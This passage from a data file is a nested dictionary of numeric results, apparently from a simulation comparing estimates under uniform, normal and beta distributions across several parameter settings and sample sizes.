0.24036435405117293, 'beta2': 0.8216125007394981, 'beta4': 0.14849218268167758}, 400: {'uni': 0.24106960987934098, 'nor': 0.5689946627658751, 'beta1': 0.24110128297972788, 'beta2': 0.771591571279977, 'beta4': 0.1543868467871832}, 300: {'uni': 0.23882273709350196, 'nor': 0.4942731879466135, 'beta1': 0.24011478876050937, 'beta2': 0.6245393310482865, 'beta4': 0.16399101088173093}, 200: {'uni': 0.24033816531081775, 'nor': 0.4032448186638761, 'beta1': 0.2399443452121945, 'beta2': 0.49293684523390047, 'beta4': 0.17527446161393567}, 150: {'uni': 0.2428018327342402, 'nor': 0.3669217193782184, 'beta1': 0.24180877006068127, 'beta2': 0.43756548053840366, 'beta4': 0.18593075843293286}, 100: {'uni': 0.24262619876046118, 'nor': 0.3259239792998355, 'beta1': 0.24152719536498482, 'beta2': 0.3596422376502065, 'beta4': 0.19880936168442362}, 75: {'uni': 0.23859171703363893, 'nor': 0.30398225973573706, 'beta1': 0.24424518838550163, 'beta2': 0.3266938110622517, 'beta4': 0.2056364855121014}, 50: {'uni': 0.24102915503645037, 'nor': 0.2812082623352389, 'beta1': 0.23754445909573635, 'beta2': 0.2988380192608764, 'beta4': 0.21540966947026327}, 30: {'uni': 0.2402253812885772, 'nor': 0.2666026471184283, 'beta1': 0.238929898071989, 'beta2': 0.2770974742803761, 'beta4': 0.22610654163969296}, 20: {'uni': 0.24434570435380387, 'nor': 0.2585112146540725, 'beta1': 0.2415807147279158, 'beta2': 0.2606342573619894, 'beta4': 0.2305235355150038}, 10: {'uni': 0.23918493863914453, 'nor': 0.2509286566547784, 'beta1': 0.23933002800193567, 'beta2': 0.2500227362262458, 'beta4': 0.23670716858488702}}, 150: {1000: {'uni': 0.2480258537942248, 'nor': 1.3567928708960895, 'beta1': 0.24224804232432381, 'beta2': 1.6175890623628855, 'beta4': 0.13045756918703702}, 750: {'uni': 0.24465195063462994, 'nor': 1.1068928812494132, 'beta1': 0.2390436777424845, 'beta2': 1.2607007883259005, 'beta4': 0.1347810736042871}, 500: {'uni': 0.24355017278923838, 'nor': 0.8046287611337243, 'beta1': 0.23962944961533086, 'beta2': 1.0101784924140815, 'beta4': 0.1422529745324236}, 400: {'uni': 0.24311042262969, 'nor': 0.7001338423910112, 'beta1': 0.23781604544465967, 'beta2': 0.8503161974117437, 'beta4': 0.14755128201516188}, 300: {'uni': 0.23886975355360363, 'nor': 0.5799765440309484, 'beta1': 0.2439218469056476, 'beta2': 0.6752562646617146, 'beta4': 0.15560177975408335}, 200: {'uni': 0.23888626458857498, 'nor': 0.4649258351555267, 'beta1': 0.24029027385551024, 'beta2': 0.5570408390062839, 'beta4': 0.16698610009308248}, 150: {'uni': 0.24015716652317576, 'nor': 0.40765528245071664, 'beta1': 0.23978600175962048, 'beta2': 0.45441342190878464, 'beta4': 0.17750135956708718}, 100: {'uni': 0.23976629904286179, 'nor': 0.36342662382072144, 'beta1': 0.2405050450846459, 'beta2': 0.3842744497088235, 'beta4': 0.18785584249443293}, 75: {'uni': 0.2389356283416334, 'nor': 0.32259624193686903, 'beta1': 0.24191287354440572, 'beta2': 0.3467847590799506, 'beta4': 0.1980570402582252}, 50: {'uni': 0.2408638125003841, 'nor': 0.3042380864153837, 'beta1': 0.24040578066044851, 'beta2': 0.3104369462054549, 'beta4': 0.21064017543128524}, 30: {'uni': 0.2394197058224903, 'nor': 0.27555092176119034, 'beta1': 0.24086168161634688, 'beta2': 0.27796026990059064, 'beta4': 0.21692547003483736}, 20: {'uni': 0.24100489267090433, 'nor': 0.26122745551100984, 'beta1': 0.24157057222993414, 'beta2': 0.2668195198530569, 'beta4': 0.2260832537423928}, 10: {'uni': 0.24014954228965793, 'nor': 0.2557788376305037, 'beta1': 0.2403141724564668, 'beta2': 0.2530659083959061, 'beta4': 0.23335177534081086}}, 100: {1000: {'uni': 0.2605919350905233, 'nor': 1.9645624961106296, 'beta1': 0.23984751915564548, 'beta2': 1.8359008724440415, 'beta4': 0.12666464013310433}, 750: {'uni': 0.24878101533631714, 'nor': 1.5348351031851004, 'beta1': 0.24575841302133908, 'beta2': 1.4410150363381768, 'beta4': 0.13064476822715007}, 500: {'uni': 0.24897645116581815, 'nor': 1.0962913335951492, 'beta1': 0.2400935196361046, 'beta2': 1.139636254314367, 'beta4': 0.135551392373918}, 400: {'uni': 0.24719017310896974, 'nor': 0.9450762377875365, 'beta1': 0.2419823823777533, 'beta2': 0.9364751942900571, 'beta4': 0.13774817173610815}, 300: {'uni': 0.24372613070313465, 'nor': 0.7468683361456988, 'beta1': 0.2450582119509388, 'beta2': 0.753557984795017, 'beta4': 0.1447467889754068}, 200: {'uni': 0.2423349982205343, 'nor': 0.5847266279550053, 'beta1': 0.24278399441600393, 'beta2': 0.5942522950060437, 'beta4': 0.15499143884888605}, 150: {'uni': 0.23787954259994942, 'nor': 0.4961451844254886, 'beta1': 0.24362883398497165, 'beta2': 0.5160693053381106, 'beta4': 0.16281905563956578}, 100: {'uni': 0.2431276940551797, 'nor': 0.4086264133449593, 'beta1': 0.23951870411248702, 'beta2': 0.42597352884781375, 'beta4': 0.17677640465192448}, 75: {'uni': 0.23940536757528075, 'nor': 0.3615361183482404, 'beta1': 0.24118088240667318, 'beta2': 0.36478826184276736, 'beta4': 0.1859747021402646}, 50: {'uni': 0.2405321018985597, 'nor': 0.329417829885632, 'beta1': 0.23957898862480795, 'beta2': 0.33255958442071576, 'beta4': 0.19727370515804576}, 30: {'uni': 0.23802803232550665, 'nor': 0.2911149045384273, 'beta1': 0.24333835231642956, 'beta2': 0.2942912241872173, 'beta4': 0.21471628209925814}, 20: {'uni': 0.24141040151777965, 'nor': 0.27732114436367966, 'beta1': 0.24448271505810568, 'beta2': 0.27548856384185805, 'beta4': 0.22047328843008912}, 10: {'uni': 0.2395288532777793, 'nor': 0.25755653747120716, 'beta1': 0.24124009172541977, 'beta2': 0.2548693880806449, 'beta4': 0.2324567144844881}}, 75: {1000: {'uni': 0.2733620041631347, 'nor': 2.5407750263082485, 'beta1': 0.24220653292966504, 'beta2': 1.992313644576726, 'beta4': 0.12253684375736348}, 750: {'uni': 0.2652633553834021, 'nor': 1.921891394256636, 'beta1': 0.23914114635669345, 'beta2': 1.5518115385392717, 'beta4': 0.1256010750231391}, 500: {'uni': 0.2527254324730338, 'nor': 1.378831469746027, 'beta1': 0.24130850311200625, 'beta2': 1.197978006428742, 'beta4': 0.12999795860072655}, 400: {'uni': 0.24984697930169772, 'nor': 1.1613920565872908, 'beta1': 0.24214641743716728, 'beta2': 1.0259603246868627, 'beta4': 0.13486519818983125}, 300: {'uni': 0.2479963230662672, 'nor': 0.9231830439530876, 'beta1': 0.23832883927011117, 'beta2': 0.8854954020037991, 'beta4': 0.13886992475084908}, 200: {'uni': 0.24658425283069435, 'nor': 0.699588699460227, 'beta1': 0.24451554104416093, 'beta2': 0.6628263476389888, 'beta4': 0.14795321820003707}, 150: {'uni': 0.24036354199917276, 'nor': 0.5864620437412704, 'beta1': 0.23953882256474157, 'beta2': 0.54934480302271, 'beta4': 0.15620458279628316}, 100: {'uni': 0.24112317386876864, 'nor': 0.4720377913443705, 'beta1': 0.24454109705882449, 'beta2': 0.4620929610677745, 'beta4': 0.16679016410673922}, 75: {'uni': 0.23732383914340596, 'nor': 0.41438846624049946, 'beta1': 0.2412836743844065, 'beta2': 0.39789224468757356, 'beta4': 0.17713278107583144}, 50: {'uni': 0.24223937685068417, 'nor': 0.35638224091958604, 'beta1': 0.24030382984083512, 'beta2': 0.3468155717538311, 'beta4': 0.18927041379727919}, 30: {'uni': 0.2395894169045569, 'nor': 0.3096973245205462, 'beta1': 0.2402164331553301, 'beta2': 0.29699896987299107, 'beta4': 0.20300323871340764}, 20: {'uni': 0.23995144013357592, 'nor': 0.28693888172104376, 'beta1': 0.23881996736244296, 'beta2': 0.2789792810138777, 'beta4': 0.21398426243766705}, 10: {'uni': 0.24000000221392964, 'nor': 0.2686733818699048, 'beta1': 0.2420959596038857, 'beta2': 0.257136366090763, 'beta4': 0.22733847650105596}}, 50: {1000: {'uni': 0.3068311615645959, 'nor': 3.6736591202407687, 'beta1': 0.24482062417518038, 'beta2': 2.432092145781782, 'beta4': 0.12064828970911215}, 750: {'uni': 0.28912852505671655, 'nor': 2.831736231456402, 'beta1': 0.24339370076078054, 'beta2': 1.9232694348084622, 'beta4': 0.1223013388277045}, 500: {'uni': 0.27181920986827757, 'nor': 1.9692828663527602, 'beta1': 0.24558635427679554, 'beta2': 1.433268319428308, 'beta4': 0.1258545419831927}, 400: {'uni': 0.26686532731179263, 'nor': 1.6136847454717067, 'beta1': 0.24175825591154568, 'beta2': 1.2103855602059785, 'beta4': 0.12813351522250957}, 300: {'uni': 0.26080218844362724, 'nor': 1.2696291936359931, 'beta1': 0.24241872353648633, 'beta2': 0.9918663896414475, 'beta4': 0.1319777391587158}, 200: {'uni': 0.2526083259566342, 'nor': 0.933984988445101, 'beta1': 0.24158668226525173, 'beta2': 0.748342978794983, 'beta4': 0.13912045456877706}, 150: {'uni': 0.24721418406332438, 'nor': 0.752265446490613, 'beta1': 0.23797019102326195, 'beta2': 0.6327723732666909, 'beta4': 0.14465355399933033}, 100: {'uni': 0.23821559230377304, 'nor': 0.5959169440870556, 'beta1': 0.2402644588651114, 'beta2': 0.5151696891568512, 'beta4': 0.15517987578890874}, 75: {'uni': 0.24197758540193703, 'nor': 0.5012351822131893, 'beta1': 0.2385584615799185, 'beta2': 0.4423371131127513, 'beta4': 0.16250378171522337}, 50: {'uni': 0.23793436068418145, 'nor': 0.41216084348155146, 'beta1': 0.2449062869215513, 'beta2': 0.3729679962422796, 'beta4': 0.17552753698854456}, 30: {'uni': 0.2377054028390569, 'nor': 0.3398721831056038, 'beta1': 0.2427909293712705, 'beta2': 0.32306879164070423, 'beta4': 0.19187644285737177}, 20: {'uni': 0.23557847890269124, 'nor': 0.3110020923280968, 'beta1': 0.2395482080645361, 'beta2': 0.289342786687756, 'beta4': 0.20294447085260098}, 10: {'uni': 0.23949403398183788, 'nor': 0.2766693034599573, 'beta1': 0.2416512444769793, 'beta2': 0.2618531639699525, 'beta4': 0.22034386617181895}}, 30: {1000: {'uni': 0.43770022218247145, 'nor': 6.045178745535347, 'beta1': 0.259169089035364, 'beta2': 3.1789688468507187, 'beta4': 0.1189705042688022}, 750: {'uni': 0.3841643631759853, 'nor': 4.6933331437812695, 'beta1': 0.25694284971636117, 'beta2': 2.531928932737123, 'beta4': 0.11959939274766435}, 500: {'uni': 0.33214058043942385, 'nor': 3.122276993402984, 'beta1': 0.24725683979626126, 'beta2': 1.7655550798358093, 'beta4': 0.1212221979595647}, 400: {'uni': 0.3113906173398094, 'nor': 2.5706794658103362, 'beta1': 0.2492477327737819, 'beta2': 1.451535391839624, 'beta4': 0.1234228894172553}, 300: {'uni': 0.2893446935826717, 'nor': 2.0156312350698955, 'beta1': 0.24350296180449926, 'beta2': 1.201763851450293, 'beta4': 0.12591000107060388}, 200: {'uni': 0.273392826252959, 'nor': 1.3867110062484225, 'beta1': 0.24053742109476037, 'beta2': 0.9012159293412797, 'beta4': 0.13008575299715588}, 150: {'uni': 0.2640098391867243, 'nor': 1.1192388423172117, 'beta1': 0.24188846756485693, 'beta2': 0.7467375839736665, 'beta4': 0.13384427582455877}, 100: {'uni': 0.25271345398459155, 'nor': 0.8225120209007627, 'beta1': 0.23935935088809498, 'beta2': 0.5842254905275225, 'beta4': 0.1406395827941181}, 75: {'uni': 0.24788291043542154, 'nor': 0.6818298683800723, 'beta1': 0.24226210440493295, 'beta2': 0.503335957714589, 'beta4': 0.14920430843273713}, 50: {'uni': 0.24243844527057135, 'nor': 0.5339967195283021, 'beta1': 0.2373472370616648, 'beta2': 0.4136763534099132, 'beta4': 0.1594834897970974}, 30: {'uni': 0.23977426044085998, 'nor': 0.40713183447342743, 'beta1': 0.23982470684155024, 'beta2': 0.340373579415394, 'beta4': 0.17496600438379623}, 20: {'uni': 0.23565550978474273, 'nor': 0.35827410322120223, 'beta1': 0.2432582988872901, 'beta2': 0.3028878123522787, 'beta4': 0.18830622296140384}, 10: {'uni': 0.23884244412859004, 'nor': 0.29774554749212095, 'beta1': 0.2429434805995286, 'beta2': 0.27437982722009696, 'beta4': 0.21104469675517187}}, 20: {1000: {'uni': 0.6892754769519168, 'nor': 9.176593622378835, 'beta1': 0.3054951826847113, 'beta2': 4.158533410554479, 'beta4': 0.11844646746439941}, 750: {'uni': 0.5710910368783783, 'nor': 6.85879055020698, 'beta1': 0.291224584817929, 'beta2': 3.3258091577056934, 'beta4': 0.11833379076172601}, 500: {'uni': 0.4490264171861371, 'nor': 4.7388425168137704, 'beta1': 0.2709631964122811, 'beta2': 2.2681127604964746, 'beta4': 0.12091634200893009}, 400: {'uni': 0.40262558544632876, 'nor': 3.7499381178342865, 'beta1': 0.2654247666116526, 'beta2': 1.8935692321733735, 'beta4': 0.12140087563180225}, 300: {'uni': 0.3620101021855284, 'nor': 2.8616884859791774, 'beta1': 0.25914723891983044, 'beta2': 1.486273128641971, 'beta4': 0.12333325025392265}, 200: {'uni': 0.31638143108661526, 'nor': 2.0253546810063368, 'beta1': 0.25051322402716275, 'beta2': 1.0906532820059176, 'beta4': 0.12414596326922459}, 150: {'uni': 0.2932601912449958, 'nor': 1.5701446424813754, 'beta1': 0.2495773997859125, 'beta2': 0.8805733827030208, 'beta4': 0.12850544780237397}, 100: {'uni': 0.2722615156392054, 'nor': 1.134814986920992, 'beta1': 0.243554476948524, 'beta2': 0.6953269837820146, 'beta4': 0.13413712917838938}, 75: {'uni': 0.26123409553509197, 'nor': 0.9185645079205841, 'beta1': 0.24067258854087187, 'beta2': 0.5785524796549206, 'beta4': 0.13768242690559246}, 50: {'uni': 0.2525355140660586, 'nor': 0.6919711376282242, 'beta1': 0.23972453350777076, 'beta2': 0.4621193525410244, 'beta4': 0.14896875998737302}, 30: {'uni': 0.23699092514081888, 'nor': 0.5142059925503737, 'beta1': 0.24033718948188124, 'beta2': 0.3680441197157298, 'beta4': 0.1610601094304951}, 20: {'uni': 0.2368489537086997, 'nor': 0.41959311120894416, 'beta1': 0.2362577222524531, 'beta2': 0.3210354805279546, 'beta4': 0.1755531728961799}, 10: {'uni': 0.2305135874565801, 'nor': 0.33410673964967214, 'beta1': 0.23977045087805413, 'beta2': 0.2750600950398116, 'beta4': 0.19802118365276158}}, 10: {1000: {'uni': 1.9338996668648218, 'nor': 19.136519606563095, 'beta1': 0.7769604206007231, 'beta2': 7.135018695387052, 'beta4': 0.11672148234838667}, 750: {'uni': 1.503083114158401, 'nor': 14.244166458989907, 'beta1': 0.6245406492874473, 'beta2': 5.485855890374126, 'beta4': 0.11590778540337585}, 500: {'uni': 1.0540269543763192, 'nor': 9.636675903157979, 'beta1': 0.4769109867417122, 'beta2': 3.629626196155065, 'beta4': 0.1183646543268232}, 400: {'uni': 0.8778275527846914, 'nor': 7.683428962543298, 'beta1': 0.4235006921305748, 'beta2': 3.1126286625190698, 'beta4': 0.11969294332215273}, 300: {'uni': 0.7118782458518407, 'nor': 5.858208987207176, 'beta1': 0.3702183338793529, 'beta2': 2.2862080783939276, 'beta4': 0.11904220668366429}, 200: {'uni': 0.5317782007011279, 'nor': 3.8818182676243946, 'beta1': 0.3209894941286431, 'beta2': 1.5812012320642916, 'beta4': 0.12034673949960818}, 150: {'uni': 0.45446323423335977, 'nor': 3.0242125711856995, 'beta1': 0.2934232739269098, 'beta2': 1.2805423857971638, 'beta4': 0.12101602618457948}, 100: {'uni': 0.3725508635970142, 'nor': 2.120209894960073, 'beta1': 0.2710235563443484, 'beta2': 0.9070242917255719, 'beta4': 0.12465509096909932}, 75: {'uni': 0.33099815865895554, 'nor': 1.6693650264528523, 'beta1': 0.26131183836252986, 'beta2': 0.756986585821483, 'beta4': 0.12709622599790013}, 50: {'uni': 0.29398694375602924, 'nor': 1.205885184224821, 'beta1': 0.24971858473676287, 'beta2': 0.5807948967581763, 'beta4': 0.13265854229106566}, 30: {'uni': 0.26585428555308954, 'nor': 0.8178737757159222, 'beta1': 0.2418697448772308, 'beta2': 0.43669480643723463, 'beta4': 0.14211953887757617}, 20: {'uni': 0.24373877950691725, 'nor': 0.6138785967144306, 'beta1': 0.23342640175778887, 'beta2': 0.36068002883182226, 'beta4': 0.152895376758761}, 10: {'uni': 0.23264013625029636, 'nor': 0.43398578358983597, 'beta1': 0.22974394844926418, 'beta2': 0.29064283196263124, 'beta4': 0.17437119004836585}}}, 0.25: {1000: {1000: {'uni': 0.21098657037380533, 'nor': 0.35166149873456404, 'beta1': 0.20873759868671643, 'beta2': 0.8400951538540714, 'beta4': 0.1568594703186771}, 750: {'uni': 0.21077721252896842, 'nor': 0.3118537438226372, 'beta1': 0.20810169176177157, 'beta2': 0.6154419955912691, 'beta4': 0.1626506015661881}, 500: {'uni': 0.2121717067619794, 'nor': 0.27590570785230367, 'beta1': 0.2097214424172366, 'beta2': 0.43817472674515884, 'beta4': 0.17369850324548264}, 400: {'uni': 0.20802888613437368, 'nor': 0.26338964054208136, 'beta1': 0.2112189750302959, 'beta2': 0.38728535180277673, 'beta4': 0.17861053808286997}, 300: {'uni': 0.21361140102104362, 'nor': 0.24953596598208133, 'beta1': 0.21110518290253538, 'beta2': 0.3282216898198249, 'beta4': 0.18491825048533722}, 200: {'uni': 0.20729973695492088, 'nor': 0.23646891400599884, 'beta1': 0.20777961312417817, 'beta2': 0.2855197842554735, 'beta4': 0.19176746815365306}, 150: {'uni': 0.2095608253801655, 'nor': 0.2306371196887052, 'beta1': 0.20960687523291455, 'beta2': 0.2636115633933207, 'beta4': 0.19773334554066177}, 100: {'uni': 0.21145691141407225, 'nor': 0.22635031334486544, 'beta1': 0.207683026125086, 'beta2': 0.24292859255051902, 'beta4': 0.20134269310222558}, 75: {'uni': 0.20558051369572755, 'nor': 0.21610770490399964, 'beta1': 0.2074046337720713, 'beta2': 0.23277178385060804, 'beta4': 0.1993614439736463}, 50: {'uni': 0.2098521724204996, 'nor': 0.2147126715773342, 'beta1': 0.21166974003626254, 'beta2': 0.22486117495033467, 'beta4': 0.20265654637570651}, 30: {'uni': 0.21172537882212614, 'nor': 0.21638631455788926, 'beta1': 0.20945408468660293, 'beta2': 0.21870178357399692, 'beta4': 0.20573186312975994}, 20: {'uni': 0.20765899216156328, 'nor': 0.2127196854834208, 'beta1': 0.20989722816174097, 'beta2': 0.21522510154220564, 'beta4': 0.20662730212304828}, 10: {'uni': 0.21324200721363007, 'nor': 0.21458476725098155, 'beta1': 0.21159185053784305, 'beta2': 0.21285942913108694, 'beta4': 0.20769505756945225}}, 750: {1000: {'uni': 0.20869501576743424, 'nor': 0.38956307451420247, 'beta1': 0.20929217837762587, 'beta2': 0.8294859264269948, 'beta4': 0.14827843794917997}, 750: {'uni': 0.21191372347879, 'nor': 0.3476256947224088, 'beta1': 0.2100895194945041, 'beta2': 0.6293056880022027, 'beta4': 0.15614558671553708}, 500: {'uni': 0.20899151314484712, 'nor': 0.3049938966927668, 'beta1': 0.21278455726040738, 'beta2': 0.4517545478635386, 'beta4': 0.16500998800014866}, 400: {'uni': 0.2094061455440297, 'nor': 0.28347980370391473, 'beta1': 0.21066797111669797, 'beta2': 0.3884084809742847, 'beta4': 0.17168736382726482}, 300: {'uni': 0.20916785432371376, 'nor': 0.26801613836270666, 'beta1': 0.20585831925323222, 'beta2': 0.3321029400758897, 'beta4': 0.1786724604421414}, 200: {'uni': 0.2085643081118847, 'nor': 0.2475562529946184, 'beta1': 0.20903879620035365, 'beta2': 0.2939306029876208, 'beta4': 0.18588153828339068}, 150: {'uni': 0.20735477521949924, 'nor': 0.23724909106407047, 'beta1': 0.20908779012385287, 'beta2': 0.273775240862008, 'beta4': 0.19142047852315378}, 100: {'uni': 0.20869783166523406, 'nor': 0.22732909767667214, 'beta1': 0.20933417310193372, 'beta2': 0.24880217826881731, 'beta4': 0.19816157590407354}, 75: {'uni': 0.21039255871863496, 'nor': 0.22185240574552587, 'beta1': 0.20887880701399933, 'beta2': 0.2399960689165522, 'beta4': 0.20281785091945453}, 50: {'uni': 0.21029781920645818, 'nor': 0.21912777348936618, 'beta1': 0.21068267834413842, 'beta2': 0.23167246136886402, 'beta4': 0.20249769600112058}, 30: {'uni': 0.20952942367398258, 'nor': 0.21384193819534977, 'beta1': 0.21131912031339217, 'beta2': 0.21737064331552444, 'beta4': 0.20575552847814524}, 20: {'uni': 0.20890110085437386, 'nor': 0.2131594319904166, 'beta1': 0.2069034393988381, 'beta2': 0.21768352193128865, 'beta4': 0.2067555030577237}, 10: {'uni': 0.21254200132120335, 'nor': 0.21459786026621233, 'beta1': 0.20943234976185285, 'beta2': 0.21262251673957, 'beta4': 0.20999488209611167}}, 500: {1000: {'uni': 0.2059302858390542, 'nor': 0.49650776830039456, 'beta1': 0.21228903191473655, 'beta2': 0.9152969330737528, 'beta4': 0.1385187931902294}, 750: {'uni': 0.20920355176220426, 'nor': 0.41783563551683944, 'beta1': 0.20926141856456745, 'beta2': 0.7052019038441916, 'beta4': 0.14434793862546202}, 500: {'uni': 0.2151437182196634, 'nor': 0.3435520404521243, 'beta1': 0.20734688138213653, 'beta2': 0.5003830980619229, 'beta4': 0.15713333007243896}, 400: {'uni': 0.21063437135255508, 'nor': 0.31892308057831464, 'beta1': 0.21113940284117513, 'beta2': 0.4412496584112251, 'beta4': 0.16017169484934324}, 300: {'uni': 0.20774895174208088, 'nor': 0.2943930693913531, 'beta1': 0.20808087256826407, 'beta2': 0.37221993303002127, 'beta4': 0.16991539749581303}, 200: {'uni': 0.2114411912598273, 'nor': 0.2623047450364031, 'beta1': 0.20904736920658953, 'beta2': 0.31767722063774184, 'beta4': 0.17919824602785273}, 150: {'uni': 0.20986749913233252, 'nor': 0.24854552809441302, 'beta1': 0.2084663319906776, 'beta2': 0.2975844690768615, 'beta4': 0.18526543867232495}, 100: {'uni': 0.2092594424706574, 'nor': 0.23279372973204007, 'beta1': 0.21211034584787994, 'beta2': 0.2644889198824187, 'beta4': 0.19024613519545072}, 75: {'uni': 0.20844772203737807, 'nor': 0.2290003034992577, 'beta1': 0.20939561863598244, 'beta2': 0.25004310791145395, 'beta4': 0.19675116512816965}, 50: {'uni': 0.2092848896434689, 'nor': 0.22360302358346792, 'beta1': 0.21089442292304225, 'beta2': 0.23526180636184657, 'beta4': 0.1999628539597155}, 30: {'uni': 0.21018248597640826, 'nor': 0.2221002716523805, 'beta1': 0.20856908930100013, 'beta2': 0.22178971202454867, 'beta4': 0.20140677748683855}, 20: {'uni': 0.21139847384081079, 'nor': 0.21492418220939347, 'beta1': 0.21044560730256473, 'beta2': 0.21755423547583938, 'beta4': 0.2057056915636604}, 10: {'uni': 0.21253820678170735, 'nor': 0.2131854331538128, 'beta1': 0.21275732435191913, 'beta2': 0.21643787131857808, 'beta4': 0.20769941181178414}}, 400: {1000: {'uni': 0.20950261162873524, 'nor': 0.5592207143886676, 'beta1': 0.20822088577391698, 'beta2': 0.9405640273128262, 'beta4': 0.13503805725703802}, 750: {'uni': 0.20840138500109906, 'nor': 0.4650706220967377, 'beta1': 0.20526961258426463, 'beta2': 0.7104148724896289, 'beta4': 0.13947694930523324}, 500: {'uni': 0.20944699177544024, 'nor': 0.3750531448374544, 'beta1': 0.2084873935072584, 'beta2': 0.5124805978381733, 'beta4': 0.150674746212122}, 400: {'uni': 0.21053083340394316, 'nor': 0.34703743831574946, 'beta1': 0.20776791692219637, 'beta2': 0.44807947444895996, 'beta4': 0.15642781061103203}, 300: {'uni': 0.2074453749043504, 'nor': 0.31374511391981097, 'beta1': 0.21042211951567266, 'beta2': 0.38435133093857443, 'beta4': 0.16508578865255383}, 200: {'uni': 0.2104725786341283, 'nor': 0.2799770460973791, 'beta1': 0.20755994599842575, 'beta2': 0.34310666630971454, 'beta4': 0.17526551053955433}, 150: {'uni': 0.2096991276282607, 'nor': 0.25909354880735697, 'beta1': 0.21020106280412626, 'beta2': 0.3026139672022534, 'beta4': 0.18019983975383427}, 100: {'uni': 0.21072783143131407, 'nor': 0.2441372701363183, 'beta1': 0.2103056697850539, 'beta2': 0.26482028071061453, 'beta4': 0.18743887187889346}, 75: {'uni': 0.21105992437147847, 'nor': 0.23961175954975408, 'beta1': 0.20974892521253838, 'beta2': 0.25146456182551963, 'beta4': 0.1945200088246506}, 50: {'uni': 0.21121839060128927, 'nor': 0.22491565366984967, 'beta1': 0.20657380975370745, 'beta2': 0.23555742098780033, 'beta4': 0.19921377300790927}, 30: {'uni': 0.210239619388815, 'nor': 0.22117997080110338, 'beta1': 0.2090488783845568, 'beta2': 0.22806384829930174, 'beta4': 0.2023335447482615}, 20: {'uni': 0.20710380380206825, 'nor': 0.21627486248329422, 'beta1': 0.20980239596055913, 'beta2': 0.22058570136671965, 'beta4': 0.20218103858951156}, 10: {'uni': 0.21015959409654134, 'nor': 0.21454425127510138, 'beta1': 0.2118316634707065, 'beta2': 0.21620662628256074, 'beta4': 0.20829747772817003}}, 300: {1000: {'uni': 0.21024825533358832, 'nor': 0.6739178980512721, 'beta1': 0.2085070129937928, 'beta2': 1.0261291442854992, 'beta4': 0.12715583194445038}, 750: {'uni': 0.2118817480727133, 'nor': 0.5637239937328892, 'beta1': 0.21166510216163434, 'beta2': 0.7773995918748892, 'beta4': 0.1324222831320455}, 500: {'uni': 0.2098650271914982, 'nor': 0.4371006134554429, 'beta1': 0.20733569395123477, 'beta2': 0.5680527516013063, 'beta4': 0.14332521349654906}, 400: {'uni': 0.2083566386881128, 'nor': 0.3942554582663016, 'beta1': 0.2109565236914346, 'beta2': 0.49603828475465767, 'beta4': 0.15004299961046552}, 300: {'uni': 0.2100854250121582, 'nor': 0.35012881881465224, 'beta1': 0.20823701579975476, 'beta2': 0.44755108426014584, 'beta4': 0.15584642690437633}, 200: {'uni': 0.2097480900554049, 'nor': 0.29687244055718565, 'beta1': 0.21075844321998985, 'beta2': 0.3656759955352811, 'beta4': 0.16579343571612243}, 150: {'uni': 0.20568174343660908, 'nor': 0.27935310252324946, 'beta1': 0.20756684708571857, 'beta2': 0.3228522288000466, 'beta4': 0.17502874843773394}, 100: {'uni': 0.20807636324904133, 'nor': 0.257139917737112, 'beta1': 0.21060259493504813, 'beta2': 0.28415204574523667, 'beta4': 0.18088846276906836}, 75: {'uni': 0.20708717304715557, 'nor': 0.245123598107367, 'beta1': 0.21219451365636394, 'beta2': 0.26166242982354787, 'beta4': 0.18805634454725603}, 50: {'uni': 0.21114468570411718, 'nor': 0.23207945600734575, 'beta1': 0.20959999471878374, 'beta2': 0.24206775007689266, 'beta4': 0.19335277680526938}, 30: {'uni': 0.20889523163632018, 'nor': 0.22229036893037993, 'beta1': 0.2106596749268794, 'beta2': 0.22937469799168445, 'beta4': 0.1989194572736962}, 20: {'uni': 0.2102417437445108, 'nor': 0.22075709709390393, 'beta1': 0.20895525479901536, 'beta2': 0.22010616263145255, 'beta4': 0.20157150517012473}, 10: {'uni': 0.20971114225447923, 'nor': 0.21561068929125432, 'beta1': 0.21213500548933353, 'beta2': 0.2138950648584445, 'beta4': 0.20638012090126817}}, 200: {1000: {'uni': 0.2132043812817941, 'nor': 0.9112094985009763, 'beta1': 0.21016177088672316, 'beta2': 1.1300645808309855, 'beta4': 0.1220144503244021}, 750: {'uni': 0.21020500282826535, 'nor': 0.7303054388794163, 'beta1': 0.2082163820708222, 'beta2': 0.8966738981783481, 'beta4': 0.12513962151857672}, 500: {'uni': 0.21072696514065975, 'nor': 0.548060627369271, 'beta1': 0.2081097778706287, 'beta2': 0.6558892676359798, 'beta4': 0.13425940545320267}, 400: {'uni': 0.20826445824295223, 'nor': 0.4719804690803897, 'beta1': 0.20898168226932218, 'beta2': 0.6139619653605363, 'beta4': 0.14021057525633163}, 300: {'uni': 0.2088021243690594, 'nor': 0.41713866780936254, 'beta1': 0.2087285946134042, 'beta2': 0.5038582733443089, 'beta4': 0.14660369998262146}, 200: {'uni': 0.2095189003633896, 'nor': 0.34807203300134953, 'beta1': 0.21047061569599942, 'beta2': 0.3977231148120064, 'beta4': 0.156646349521216}, 150: {'uni': 0.2093387615726338, 'nor': 0.3085400352109468, 'beta1': 0.20643570767629546, 'beta2': 0.3615010078549322, 'beta4': 0.16375551575980912}, 100: {'uni': 0.21064378643772108, 'nor': 0.28151818018358465, 'beta1': 0.2090926446634528, 'beta2': 0.30632844588543734, 'beta4': 0.17625942352213347}, 75: {'uni': 0.20671027913469828, 'nor': 0.2618837476630965, 'beta1': 0.2088637313648498, 'beta2': 0.2742687431604851, 'beta4': 0.1779630781714797}, 50: {'uni': 0.20687981613909145, 'nor': 0.2452119427254388, 'beta1': 0.2096125229272614, 'beta2': 0.2528198013170253, 'beta4': 0.18932221495486176}, 30: {'uni': 0.20986940612030017, 'nor': 0.23138385594723265, 'beta1': 0.21273630607793315, 'beta2': 0.23562615341383045, 'beta4': 0.19662520636393377}, 20: {'uni': 0.2096800769725957, 'nor': 0.2219903761746839, 'beta1': 0.208530873235143, 'beta2': 0.22519313310665248, 'beta4': 0.20072480517089764}, 10: {'uni': 0.20995102667780532, 'nor': 0.21809511923800973, 'beta1': 0.21113193936796237, 'beta2': 0.21507494725665083, 'beta4': 0.20129922751033036}}, 150: {1000: {'uni': 0.21848728221083116, 'nor': 1.1494726368233732, 'beta1': 0.20925879994061328, 'beta2': 1.2847422292556834, 'beta4': 0.11801063285369316}, 750: {'uni': 0.21006532285377288, 'nor': 0.9160472232808671, 'beta1': 0.21041748896864573, 'beta2': 0.9842221927965498, 'beta4': 0.120532017454987}, 500: {'uni': 0.2109702173498153, 'nor': 0.6730564167022827, 'beta1': 0.20805261563312868, 'beta2': 0.8093562303980775, 'beta4': 0.1285665146333448}, 400: {'uni': 0.21151275112656406, 